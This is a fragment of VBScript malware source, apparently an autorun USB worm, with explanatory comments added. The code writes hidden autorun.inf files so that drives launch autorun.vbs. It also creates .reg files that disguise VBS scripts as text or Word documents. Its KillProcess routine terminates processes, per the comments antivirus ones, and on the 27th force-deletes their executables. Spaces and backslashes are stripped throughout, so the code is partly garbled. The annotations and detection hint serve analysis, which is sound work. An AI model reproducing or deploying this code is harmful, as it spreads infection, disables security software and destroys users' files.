Setf=fs.GetFile(z.DriveLetter&":autorun.inf")

' Attributes are cleared to 0 so the file can be rewritten.
f.attributes=f.attributes-f.attributes

' 2 = ForWriting, -2 = system default text format.
Setts=f.OpenAsTextStream(2,-2)

' Page annotation on the next line: "the following creates the autoplay file".
ts.WriteLine"[AutoRun]"(以下建立自动播放文件)

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

f.attributes=f.attributes+7

endif

else

Setts=fs.CreateTextFile(z.DriveLetter&":autorun.inf",true)

ts.WriteLine"[AutoRun]"

ts.WriteLine"open="

ts.WriteLine""

ts.WriteLine"shellopen=打开(&O)"

ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"

ts.WriteLine"shellopenDefault=1"

ts.close

Setf=fs.GetFile(z.DriveLetter&":autorun.inf")

f.attributes=f.attributes+7

EndIf

' vbs.reg: MUICache display string for wshext.dll,-4802 set to "text file" (in Chinese).
iffs.FileExists(z.DriveLetter&":vbs.reg")then

else

Setts=fs.CreateTextFile(z.DriveLetter&":vbs.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)

ts.close

Setf=fs.GetFile(z.DriveLetter&":vbs.reg")

f.attributes=f.attributes+7

endif

' doc.reg: same value set to "Microsoft Word document" (in Chinese).
iffs.FileExists(z.DriveLetter&":doc.reg")then

else

Setts=fs.CreateTextFile(z.DriveLetter&":doc.reg",true)

ts.WriteLine"WindowsRegistryEditorVersion5.00"

ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"

ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)

ts.close

Setf=fs.GetFile(z.DriveLetter&":doc.reg")

f.attributes=f.attributes+7

endif

endFunction

' KillProcess: terminates processes selected by name or by numeric handle through a WMI query
' on Win32_Process. regtime calls it with a fixed list of antivirus process names.
' On the 27th of a month, in the by-name branch, it also deletes the executable file of each
' process it terminated.
' Returns: True only when a process was terminated in the numeric (handle) branch; the by-name
' branch leaves the return value at False.
' Detection hint: wscript.exe issuing Win32_Process queries followed by Terminate on security products.
FunctionKillProcess(NameorPID)

OnErrorResumeNext

DimoWMI,oProcs,oProc,strSQL

KillProcess=False

strSQL="SELECT*FROMWin32_Process"

' An empty argument leaves the query unfiltered.
IfNameOrPID<>""Then

IfIsNumeric(NameOrPID)Then

strSQL=strSQL&"WHEREHandle='"&NameorPID&"'"

Else

strSQL=strSQL&"WHEREName='"&NameorPID&"'"

EndIf

EndIf

' WMI moniker for the local root cimv2 namespace; its backslashes were lost in extraction.
SetoWMI=GetObject("winmgmts:.rootcimv2")

SetoProcs=oWMI.ExecQuery(strSQL)

ForEachoProcInoProcs

IfIsNumeric(NameOrPID)Then

oProc.Terminate

KillProcess=True

Else

oProc.Terminate

' Date-triggered payload: on the 27th the terminated process's executable is force-deleted.
ifday(date())="27"then

setkillfile=fs.getfile(oProc.ExecutablePath)

killfile.delete(true)

EndIf

endif

Next

SetoProc=Nothing

SetoProcs=Nothing

SetoWMI=Nothing

EndFunction
